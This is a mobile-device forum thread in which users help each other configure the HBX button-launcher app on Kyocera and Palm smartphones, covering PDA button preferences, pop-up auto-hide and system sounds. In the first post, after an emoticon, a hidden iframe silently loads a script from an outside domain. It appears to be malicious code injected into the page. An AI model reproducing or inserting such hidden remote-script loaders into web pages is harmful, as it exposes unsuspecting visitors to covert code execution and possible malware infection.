+ Reply to Thread

Thread: HBX help

HBX help

Yes I tried the search function before writing this. :p

I just installed the trial HBX. There are special instructions for the Kyo users. It says in reference to using the app and the smartphone:

The Address application uses the hard button press and hold action to beam a Business Card, while the Memo Pad application starts Voice Memo Recording.
    These programs treat the press and hold action in different ways, so HBX needs to be set up correctly for them.
    To set up HBX for both applications, tap the appropriate icon to open the Button Options window:

The icon is three dots .... For the life of me, I cannot find the Button Options menu. I've tried everything, even emailing the company, but no deal.

Any help would be greatly appreciated....

:alieneyes<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I'll try my best to help out, but with the lack of explaining skills, it may be difficult....

Basically that message is saying that in your PDAprefs under buttons, whatever you program in there will remain there. With HBX installed, if you press and hold the button (after the 4 options pop up), it automatically launches the program selected in the PDAprefs under buttons. So, if you want to beam your business card to someone, you need to keep the address book set on the second button. I didn't do that, so when I press and hold the second button, it launches what I selected as my second button in PDAprefs, which is the actual phone. However, if you want to still launch your business card or voice memo and you don't have them set to the appropriate button, you can still manage to activate them with only 2 button presses. First, launch the HBX popup menu corresponding to that particular program launch, then release. With that opened, press and hold the button for that program and it will activate that function. (ie: I have my address book under the button 1 menu, option 3. If I push button 1, it shows my 4 selections. I then press and hold button 3 and it automatically beams my business card.)

The three little dots at the bottom of the HBX options screen is just to change the color of the popup menu when you launch the HBX launcher. Hopefully this was of some help to you.
    Derek

Sony Clie N710->Sony Clie NR70V->Treo 300->Kyocera 7135->Samsung SPH-i500->Treo 650 "ACE"

Hmmm...ok, part of what I said isn't true. As it turns out, I had my Address book set to button 2 in PDAprefs, so lets try again. If you set your address book or memo to any buttons in PDAprefs, pressing and holding that button while using HBX will automatically launch that program. In fact, any button you have set up in PDAprefs will launch if you press and hold once it has popped up in HBX. For example, if you set your address book to button 2 and press and hold button 2, it will launch the address book, and a continued press will launch the beaming of business card. If you press button 2 though with HBX and then press and hold button 3, 4, or 1 with the HBX popup menu opened, that button will still launch the address book or whichever program you have set to the initial button pressed. Basically what the warning was saying to you is something like "if you want to use the preset beaming of business card in PDAprefs, pressing button 2 and holding will do this, just like pressing and holding button 3 will launch the voice memo. Therefore keep these the same with HBX." Now, if you don't want any of these to happen, just remove the program from the PDAprefs button options. Make any sense?
    Derek

Sony Clie N710->Sony Clie NR70V->Treo 300->Kyocera 7135->Samsung SPH-i500->Treo 650 "ACE"

Derek,

Thanks for your help, I'll fiddle with it today.

Tracey

Re: HBX help

Originally posted by liltiki
    Yes I tried the search function before writing this. :p

I just installed the trial HBX. There are special instructions for the Kyo users. It says in reference to using the app and the smartphone:

The Address application uses the hard button press and hold action to beam a Business Card, while the Memo Pad application starts Voice Memo Recording.
    These programs treat the press and hold action in different ways, so HBX needs to be set up correctly for them.
    To set up HBX for both applications, tap the appropriate icon to open the Button Options window:

The icon is three dots .... For the life of me, I cannot find the Button Options menu. I've tried everything, even emailing the company, but no deal.

Any help would be greatly appreciated....

:alieneyes
    I am not sure if you got this to work or not with HBX but here is what I have done. I am assuming you have already chosen what address name is your business card as this must be the first thing done.

First, to get the three little dots tap on the HBX icon and you will get into the HBX setup. In the bottom left corner of each group for your palm hard buttons you should see the three little buttons. If you tap the three buttons you can do two things. First you can change the background color (as mentioned previously) and second you can check the auto repeat button. If you check this HBX will act just like a press and hold on your normal palm hard buttons.

I have tested the beam business card with the HBX Auto Repeat button on and off and it works in both cases. One thing I found that I did need to have set up to get both the voice recording and the beam business card to work with the press and hold is this. If you go to the Palm "Prefs PDA" icon, then go to the 'Buttons' on the drop down, you muct have the phone icon associated with Address and the envelope icon to memos. Then HBX works fine. I tried to have these buttons in the Prefs PDA associated with other apps and then HBX did not work.

I hope this helps, good luck.

Another HBX question..

Is there any way to close the pop up window without hitting the close button on the main screen? You have to close the pop up to use another hard key and I haven't figured out how to do this easily...

Thanks,
    Tracey

Another HBX question..

Is there any way to close the pop up window without hitting the close button on the main screen? You have to close the pop up to use another hard key and I haven't figured out how to do this easily...

Thanks,
    Tracey
    Yes there is, when you have HBX running hit the setup button (so you are where you assign all the apps to the buttons). Then hit the down arrow button on your palm (right below the house) that will bring up a little window and you chose Auto Hide. This will let you choose how long the HBX pop up window appears, the choises are 1, 2, 3 or 4 seconds or never.

Thanks boinker! That helps. Now is there any way to silence the annoying beeps every time the pop-ups close down?

Thanks boinker! That helps. Now is there any way to silence the annoying beeps every time the pop-ups close down?
    Ahhhh, yes....

To do this you have to silence all your system sounds however. Go to Prefs PDA then to General and where it says System Sound - set it to off

:alieneyes

Another interesting (annoying) quirk I just discovered. HBX does't work when I'm on the default phone screen. I can't go anywhere from there with HBX. The pop-up comes on, but it goes back to the default screen... It works from a third party phone app, like take phone.

anyone have a work around?

Thanks in advance..

Tracey